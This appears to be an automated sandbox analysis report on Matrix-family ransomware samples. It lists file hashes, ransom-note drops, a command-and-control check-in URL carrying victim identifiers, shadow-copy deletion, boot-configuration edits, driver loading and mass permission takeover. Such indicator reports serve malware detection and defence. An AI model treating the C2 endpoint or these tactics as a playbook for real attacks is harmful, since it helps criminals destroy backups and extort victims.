Overview
overview
10Static
static
3FoxRansomw...65.exe
windows7-x64
10FoxRansomw...65.exe
windows10-2004-x64
10FoxRansomw...a7.exe
windows7-x64
10FoxRansomw...a7.exe
windows10-2004-x64
10FoxRansomw...20.exe
windows7-x64
10FoxRansomw...20.exe
windows10-2004-x64
10FoxRansomw...0b.exe
windows7-x64
10FoxRansomw...0b.exe
windows10-2004-x64
10FoxRansomw...53.exe
windows7-x64
10FoxRansomw...53.exe
windows10-2004-x64
10FoxRansomw...b1.exe
windows7-x64
10FoxRansomw...b1.exe
windows10-2004-x64
10Analysis
-
max time kernel
150s -
max time network
124s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
arch:x64arch:x86image:win7-20231215-enlocale:en-usos:windows7-x64system -
submitted
13-02-2024 05:15
Static task
static1
Behavioral task
behavioral1
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win7-20231215-en
Behavioral task
behavioral2
Sample
FoxRansomware/0676816e9e450dea861a65a0b29f44179e1999f09a24e488ec6756528a5e6b65.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral3
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win7-20231215-en
Behavioral task
behavioral4
Sample
FoxRansomware/0b03bf1c7b596a862978999eebfa0703e6de48912c9a57e2fed3ae5cd747bea7.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral5
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win7-20231215-en
Behavioral task
behavioral6
Sample
FoxRansomware/42f07bec4edcba04adac1d944f5ec131628565da831fccbfcd42292ea520a620.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral7
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win7-20231215-en
Behavioral task
behavioral8
Sample
FoxRansomware/6e9060d56e669658b059f25a05f37f4d266658fece36afdb564536607fd9570b.exe
Resource
win10v2004-20231215-en
Behavioral task
behavioral9
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win7-20231215-en
Behavioral task
behavioral10
Sample
FoxRansomware/91d07adbf35edb6bb96e7b210f17b9b868ed858802727d6f69c1e5a2d37a9c53.exe
Resource
win10v2004-20231222-en
Behavioral task
behavioral11
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win7-20231215-en
Behavioral task
behavioral12
Sample
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
Resource
win10v2004-20231215-en
General
-
Target
FoxRansomware/941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe
-
Size
1.2MB
-
MD5
c82d64850d35cc6a536c11adbd261cf6
-
SHA1
9f4d070a1b4668d110b57c167c4527fa2752c1fe
-
SHA256
941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1
-
SHA512
777a06d73e70a881d5b3872236ba8b53aa4d42f94ad247c109980847ccd6d0c531d30afef10315d7b5fe70c7fe4496f932aaac41f6aec76e98474c44bb781002
-
SSDEEP
24576:pLeb4QFvTn5TuJR5ezGPMy4EnBBuKfDW:Qb/GMef
Malware Config
Extracted
http://myexternalip.com/raw
Extracted
C:\Program Files\Google\Chrome\Application\#KOK8_README#.rtf
https://bitmsg.me
https://bitmsg.me/users/sign_up
https://bitmsg.me/users/sign_in
Signatures
-
Matrix Ransomware 64 IoCs
Targeted ransomware with information collection and encryption functionality.
description flow ioc Process File created C:\Program Files\VideoLAN\VLC\locale\ps\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\uz\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\wa\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Package Cache\{662A0088-6FCD-45DD-9EA7-68674058AED5}v14.30.30704\packages\vcRuntimeMinimum_amd64\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Indiana\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.emf.common_2.10.1.v20140901-1043\META-INF\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\pt_PT\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Public\Music\Sample Music\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Microsoft\Assistance\Client\1.0\fr-FR\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Chess\fr-FR\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Mozilla Firefox\gmp-clearkey\0.1\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\{F6080405-9FA8-4CAA-9982-14E95D1A3DAC}v14.30.30704\packages\vcRuntimeMinimum_x86\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\ProgramData\Package Cache\54050A5F8AE7F0C56E553F0090146C17A1D2BF8D\packages\Patch\x64\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\features\org.eclipse.ecf.core.feature_1.1.0.v20140827-1444\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\.settings\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\fy\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\lua\playlist\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ckb\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Code Cache\wasm\index-dir\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\America\Argentina\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\core\locale\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Purble Place\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\hr\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Recovery\add7a402-9b9f-11ee-a130-ac12cddc57f5\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Chess\de-DE\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\GPUCache\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Google\Update\Install\{F2D1DCEA-3974-4AE2-AC88-A893D86175E3}\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\hi\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Public\Libraries\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files (x86)\Adobe\Reader 9.0\Reader\IDTemplates\ENU\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\jre\lib\deploy\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\af\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\Profiles\jc9ad0k2.default-release\storage\permanent\chrome\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe HTTP URL 5 http://fredstat.000webhostapp.com/addrecord.php?apikey=kok8_api_key&compuser=AILVMYUM|Admin&sid=2XRJB5TcgMJsn6i0&phase=66FCC65BF7EE05F7|3845|1GB Process not Found File created C:\Program Files\VideoLAN\VLC\locale\ca\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\AppData\Roaming\Mozilla\Firefox\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\All Users\Microsoft\Device Stage\Task\{07deb856-fc6e-4fb9-8add-d8f2cf8722c9}\ja-JP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Hearts\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\km\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ro\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Google\Chrome\Application\106.0.5249.119\Installer\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Multiplayer\Spades\it-IT\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\el\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Chess\ja-JP\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\More Games\en-US\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\as_IN\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre7\lib\zi\Indian\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jre7\lib\fonts\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Microsoft Games\Minesweeper\es-ES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\fi\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\configuration\org.eclipse.update\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Favorites\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.console.ui.notification_5.5.0.165303\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Users\Admin\Documents\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File created C:\Program Files\VideoLAN\VLC\locale\ka\LC_MESSAGES\#KOK8_README#.rtf 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe -
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Modifies boot configuration data using bcdedit 1 TTPs 2 IoCs
pid Process 3296 bcdedit.exe 2348 bcdedit.exe -
Blocklisted process makes network request 1 IoCs
flow pid Process 9 2460 powershell.exe -
Drops file in Drivers directory 1 IoCs
description ioc Process File created C:\Windows\system32\Drivers\PROCEXP152.SYS sOCkujKF64.exe -
Sets service image path in registry 2 TTPs 1 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SYSTEM\ControlSet001\services\PROCEXP152\ImagePath = "\\??\\C:\\Windows\\system32\\Drivers\\PROCEXP152.SYS" sOCkujKF64.exe -
Executes dropped EXE 64 IoCs
pid Process 2344 NWaVfX3D.exe 852 sOCkujKF.exe 2760 sOCkujKF64.exe 2412 sOCkujKF.exe 1176 sOCkujKF.exe 2632 sOCkujKF.exe 2268 sOCkujKF.exe 3232 sOCkujKF.exe 2316 sOCkujKF.exe 3104 sOCkujKF.exe 2088 sOCkujKF.exe 2236 sOCkujKF.exe 1952 sOCkujKF.exe 776 sOCkujKF.exe 3544 sOCkujKF.exe 4292 sOCkujKF.exe 4324 sOCkujKF.exe 4428 sOCkujKF.exe 4456 sOCkujKF.exe 4548 sOCkujKF.exe 4572 sOCkujKF.exe 4656 sOCkujKF.exe 4688 sOCkujKF.exe 4788 sOCkujKF.exe 4808 sOCkujKF.exe 4904 sOCkujKF.exe 4928 sOCkujKF.exe 5012 sOCkujKF.exe 5044 sOCkujKF.exe 3276 sOCkujKF.exe 1144 sOCkujKF.exe 3996 sOCkujKF.exe 3964 sOCkujKF.exe 2372 sOCkujKF.exe 2412 sOCkujKF.exe 3368 sOCkujKF.exe 108 sOCkujKF.exe 2112 sOCkujKF.exe 1884 sOCkujKF.exe 1536 sOCkujKF.exe 692 sOCkujKF.exe 3836 sOCkujKF.exe 1420 sOCkujKF.exe 712 sOCkujKF.exe 2548 sOCkujKF.exe 3920 sOCkujKF.exe 3912 sOCkujKF.exe 2672 sOCkujKF.exe 528 sOCkujKF.exe 968 sOCkujKF.exe 2516 sOCkujKF.exe 1912 sOCkujKF.exe 1112 sOCkujKF.exe 440 sOCkujKF.exe 2596 sOCkujKF.exe 2876 sOCkujKF.exe 3324 sOCkujKF.exe 2304 sOCkujKF.exe 1456 sOCkujKF.exe 3316 sOCkujKF.exe 812 sOCkujKF.exe 3924 sOCkujKF.exe 3444 sOCkujKF.exe 3880 sOCkujKF.exe -
Loads dropped DLL 64 IoCs
pid Process 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 2148 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe 3952 cmd.exe 852 sOCkujKF.exe 2016 cmd.exe 3252 cmd.exe 1588 cmd.exe 2292 cmd.exe 1468 cmd.exe 1704 cmd.exe 1724 cmd.exe 1112 cmd.exe 3240 cmd.exe 3172 cmd.exe 3800 cmd.exe 3024 cmd.exe 4284 cmd.exe 4232 cmd.exe 4400 cmd.exe 4352 cmd.exe 4540 cmd.exe 4488 cmd.exe 4648 cmd.exe 4600 cmd.exe 4780 cmd.exe 4724 cmd.exe 4896 cmd.exe 4836 cmd.exe 5004 cmd.exe 4960 cmd.exe 2600 cmd.exe 5076 cmd.exe 2236 cmd.exe 3044 cmd.exe 2828 cmd.exe 3412 cmd.exe 1792 cmd.exe 3724 cmd.exe 3992 cmd.exe 2692 cmd.exe 1816 cmd.exe 1960 cmd.exe 3816 cmd.exe 3852 cmd.exe 2076 cmd.exe 2620 cmd.exe 1628 cmd.exe 1708 cmd.exe 1696 cmd.exe 3544 cmd.exe 2240 cmd.exe 3948 cmd.exe 3248 cmd.exe 2256 cmd.exe 3268 cmd.exe 2060 cmd.exe 1824 cmd.exe 312 cmd.exe 1156 cmd.exe 3140 cmd.exe 3524 cmd.exe 1688 cmd.exe 2724 cmd.exe 3768 cmd.exe -
Modifies file permissions 1 TTPs 64 IoCs
pid Process 2764 takeown.exe 3532 Process not Found 1688 takeown.exe 3208 Process not Found 4768 takeown.exe 4380 takeown.exe 4724 takeown.exe 108 takeown.exe 2888 takeown.exe 4900 takeown.exe 4532 takeown.exe 5096 takeown.exe 2192 takeown.exe 3840 takeown.exe 4056 takeown.exe 4612 Process not Found 3844 takeown.exe 3840 Process not Found 5108 takeown.exe 864 takeown.exe 3580 takeown.exe 2628 takeown.exe 4696 takeown.exe 2212 takeown.exe 564 takeown.exe 3572 takeown.exe 4204 takeown.exe 2176 takeown.exe 3268 takeown.exe 3572 takeown.exe 1176 Process not Found 3632 takeown.exe 2604 takeown.exe 1664 takeown.exe 2084 takeown.exe 1520 takeown.exe 4572 takeown.exe 1592 takeown.exe 1176 takeown.exe 2248 takeown.exe 776 takeown.exe 2624 takeown.exe 2104 takeown.exe 1532 takeown.exe 2256 takeown.exe 4912 Process not Found 1152 takeown.exe 1588 takeown.exe 4932 takeown.exe 3328 takeown.exe 4140 takeown.exe 1404 takeown.exe 812 takeown.exe 4996 takeown.exe 3816 takeown.exe 3908 takeown.exe 2628 takeown.exe 332 takeown.exe 4312 Process not Found 3288 takeown.exe 4828 takeown.exe 1008 takeown.exe 3936 takeown.exe 2272 takeown.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral11/files/0x0006000000018b8c-1593.dat upx behavioral11/memory/852-1628-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1176-4582-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1176-4580-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/files/0x0006000000018b8c-4578.dat upx behavioral11/memory/2412-4397-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2632-4885-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1588-4882-0x00000000002A0000-0x0000000000317000-memory.dmp upx behavioral11/memory/2268-4889-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3232-4923-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/852-4965-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2316-4973-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3104-5195-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2088-5496-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2236-5941-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1952-5958-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/776-6393-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/776-6392-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3544-6437-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4292-7885-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4324-7888-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4428-7898-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4456-7901-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4548-7907-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4572-7911-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4656-7915-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4688-7921-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4788-7929-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4808-7932-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4904-7938-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/4928-7942-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5012-7947-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/5044-7952-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3276-7955-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1144-7956-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3996-7962-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3964-7963-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2372-7966-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2412-7967-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2412-7968-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3368-7971-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/108-7972-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2112-7978-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1884-7980-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1536-7984-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/692-7985-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3836-7987-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1420-7989-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/712-7993-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2548-7994-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3920-7995-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3912-7996-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2672-8001-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/528-8003-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/968-8004-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2516-8006-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1912-8009-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1112-8010-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/1112-8011-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/440-8012-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2596-8013-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2876-8017-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/3324-8018-0x0000000000400000-0x0000000000477000-memory.dmp upx behavioral11/memory/2304-8020-0x0000000000400000-0x0000000000477000-memory.dmp upx -
Drops desktop.ini file(s) 40 IoCs
description ioc Process File opened for modification C:\Users\Public\Recorded TV\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Recorded TV\Sample Media\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Chess\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Mahjong\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Documents\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\SpiderSolitaire\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\ETVASUKU\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Videos\Sample Videos\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Music\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Searches\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\2188SAD3\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Program Files\Microsoft Games\Hearts\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\AppData\Local\Microsoft\Feeds Cache\DRPRFCEW\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Admin\Favorites\Links for United States\desktop.ini 941af29a59f8d5960af161b9116bbc7d574a9af6f69a47cf0d3daeb31cba6eb1.exe File opened for modification C:\Users\Public\Libraries\desktop.ini 